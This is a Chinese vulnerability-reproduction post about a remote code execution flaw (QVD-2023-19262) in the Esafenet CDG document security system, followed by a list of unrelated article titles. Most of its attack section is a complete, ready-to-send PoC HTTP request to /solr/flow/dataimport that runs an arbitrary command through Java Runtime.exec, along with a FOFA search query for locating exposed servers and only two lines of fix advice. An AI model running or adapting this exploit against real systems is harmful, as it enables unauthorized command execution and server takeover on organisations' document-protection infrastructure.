当前位置：首页 > news >正文

亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)

news 2026/2/8 14:32:47

0x01 产品简介

亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。

0x02 漏洞概述

亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞，未经授权的攻击者可通过此漏洞执行任意指令，从而获取服务器权限。

0x03 复现环境

FOFA：app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现

http://your-ip/solr/flow/dataimport

出现以上这种情况可能存在漏洞

PoC

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip<?xml version="1.0" encoding="UTF-8"?><RDF><item/></RDF>

dnslog验证

RCE

0x05 修复建议

设置安全组仅对可信地址开放

升级至安全版本

亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)

0x01 产品简介

0x02 漏洞概述

0x03 复现环境

0x04 漏洞复现

0x05 修复建议

相关文章：

亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)

一文读懂 Nuxt.js 服务端组件

LeetCode--HOT100题（39）

“车-路-网”电动汽车充电负荷时空分布预测（matlab）

【核磁共振成像】方格化重建

JAVA中时间戳和LocalDateTime的互转

无涯教程-进程 - 创建终止

LLMs参考资料第一周以及BloombergGPT特定领域的训练 Domain-specific training: BloombergGPT

LeetCode字符串数组最长公共前缀

Git gui教程---第八篇 Git gui的使用创建一个分支

Docker修改daemon.json添加日志后无法启动的问题

QT6编译的文件分布情况

2023中国算力大会 | 中科驭数加入DPU推进计划，探讨DPU如何激活算网融合新基建

leetcode 115. 不同的子序列

gradio应用transformer模块部署生成式人工智能应用程序

【目标检测】“复制-粘贴 copy-paste” 数据增强实现

深度学习知识总结2：主要涉及深度学习基础知识、卷积神经网络和循环神经网络

Spring Boot 集成 WebSocket 实现服务端推送消息到客户端

vr游乐场项目投资方案VR主题游乐馆互动体验

chrom扩展开发配合百度图像文字识别实现自动登录（后端.net core web api）

基于大模型的 UI 自动化系统

微信小程序之bind和catch

CTF show Web 红包题第六弹

23-Oracle 23 ai 区块链表（Blockchain Table）

【网络安全产品大调研系列】2. 体验漏洞扫描

YSYX学习记录（八）

Mac软件卸载指南，简单易懂！

反射获取方法和属性

使用 Streamlit 构建支持主流大模型与 Ollama 的轻量级统一平台

以光量子为例，详解量子获取方式